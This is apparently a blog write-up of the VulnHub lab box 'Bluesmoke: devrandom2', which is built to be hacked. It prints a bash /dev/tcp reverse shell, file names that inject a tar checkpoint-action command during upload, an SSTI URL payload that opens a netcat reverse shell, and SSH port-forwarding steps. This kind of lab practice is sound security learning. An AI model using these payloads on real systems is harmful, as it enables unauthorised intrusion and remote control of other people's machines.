Bluesmoke: devrandom2 - Write-up

Publicat de pe

Box info:

Name: Bluesmoke: devrandom2

OS: Linux

Rated Difficulty: ðŸŸ©ðŸŸ©ðŸŸ¨ðŸŸ¨(medium)

Links:VulnHub

====================================================================

Nmap found only 2 open ports: port 80 and port 22.

$ nmap -sC -sV 192.168.0.56

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 17:01 EEST
Nmap scan report for 192.168.0.56
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ac:8e:9e:91:49:3f:65:f7:fb:05:07:33:a6:03:88:3f (RSA)
|   256 7f:2c:50:f5:35:9b:e2:2c:96:ff:bc:35:6a:f3:53:d1 (ECDSA)
|_  256 66:15:b0:cb:3b:ba:12:1a:40:38:eb:7f:8d:ba:a3:a4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Filee Upload to Backup
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We'll start by visiting port 80.

Looks like we have a backup system that saves everything we upload, but the uploaded files must be tar or zip.
In order to bypass the upload system and to get a shell on the box we must upload the following files:

Here are the commands used to create the files:
echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/$YOUR IP/$PORT 0>&1'" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Note: The shell.php file is not needed. This bypass above is a wildcard exploit, you can take a look here to check how it works.

Now add all of those file to a zip or a tar archive and upload it via the website system. Start a netcat listener an you'll have a shell as user backupper.

Now we'll use pspy64s to check what interesting services and processes are running:

If we let pspy64s to run a little bit longer, we'll see that there is another process running:

The command above, grep -q 1 /tmp/start, looks inside the tmp directory for a file named start. So we'll create a file named start inside the /tmp directory and we'll check the running processes again.
Note: It may take a minute or two for this commands to run, so be patient. If the commands don't run just add some commands inside the start file and make it executable.

Looks like there is another server running, and this can be confirmed by linpeas:

Port 8787 is running on localhost, so I'll port forward it by using ssh.
$ ssh -L 8787:localhost:8787 backupper@$MACHINE IP

Now we can access port 8787 from our network on localhost.

Nothing interesting here. After I talked to the box owner, he gave me a hint: SSTI
You can read more about ssti here:

To get a shell on the box using SSTI I had to run the following command:
http://localhost:8787/?name={{request.application.__globals__.__builtins__.__import__(%27os%27).popen('nc $YOUR IP $PORT -e /bin/abash').read()}}
Note: Add your machine's ip and a port to the command above.

Start a netcat listener and execute the ssti reverse shell command to get a shell as user remnie.

Inside /opt/remnie/scripts is a server.conf file with the following content:

I took all those zeros and ones and I added them separately on another file.

After that I decoded them by using this website:

The decoded bytes gave me a hex string:
4d 4e 57 [redacted]

From hex to base32:
MNWT[redacted]

from base32 to base64: 
cm9v[redacted]

And from base64 to text, we'll get the root password: 
root: -!F8[redacted]

Now we can login as root on the box.


Comments

Post a Comment